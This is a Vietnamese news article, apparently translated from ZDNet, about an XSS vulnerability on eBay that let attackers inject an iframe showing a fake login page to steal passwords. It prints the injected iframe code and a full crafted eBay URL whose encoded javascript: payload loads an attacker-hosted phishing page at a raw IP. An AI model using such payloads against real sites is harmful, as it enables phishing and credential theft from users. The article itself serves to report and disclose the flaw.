eBay lại dính lỗ hổng bảo mật cho phép tin tặc đánh cắp mật khẩu người dùng

Một lỗi bảo mật mới vừa được phát hiện trên trang web thương mại điện tử nổi tiếng eBay. Lỗi này cho phép tin tặc chuyển hướng người dùng đến một trang đăng nhập giả mạo khác và đánh cắp thông tin mật khẩu cũng như thông tin cá nhân của hàng triệu người dùng website này.

Nhà nghiên cứu bảo mật độc lập cho biết bất cứ ai cũng có thể khai thác lỗ hổng bảo mật nói trên để tấn công đánh cắp thông tin người dùng bằng cách gửi phishing – email. Phishing email là hình thức gửi email giả mạo nhằm lừa đảo nạn nhân truy cập vào đường dẫn chuyển hướng đến các trang web độc hại có chứa virus, Trojan. Lỗ hổng bảo mật trên eBay thực chất nằm trong tham số URL cho phép tin tặ tiêm nhiễm iFrame độc hại vào trang web thương mại điện tử eBay. Đây là một lỗ hổng phổ biến với tên gọi Cross-Site Scripting (XSS).

Người dùng sẽ được chuyển hướng đến một trang web có giao diện đăng nhập y hệt trang đăng nhập của eBay mà hầu hết họ không thể nhận ra được sự khác biệt. iFrame chứa trang độc hại :

document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’)

Đường dẫn URL đầy đủ:

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

Ảnh chụp màn hình truy cập URL:

Sau khi gõ tên tài khoản và mật khẩu rồi đăng nhập, người dùng sẽ nhận được thông báo lỗi. Nhưng đồng nghĩa với điều đó là thông tin của người dùng đã được chuyển tới hacker.

Sau khi phát hiện ra lỗi này, nhà nghiên cứu bảo mật đã gửi báo cáo đến eBay vào đầu tháng 12, tuy nhiên eBay lại cắt đứt liên hệ với người này và không cung cấp bản vá lỗi cho đến khi giới truyền thông báo chí tìm đến. eBay cũng đã công nhận phát hiện lỗi bảo mật của nhà nghiên cứu này trên trang web của họ vào thứ hai vừa qua.

Xuân Dung – Theo ZDnet

Có thể bạn quan tâm: ban kaspersky | download kaspersky | download phan mem kaspersky | kaspersky 2015 | kaspersky tieng viet | kaspersky viet nam | phần mềm kaspersky | tai kaspersky | kaspersky viet nam | tải phần mềm kaspersky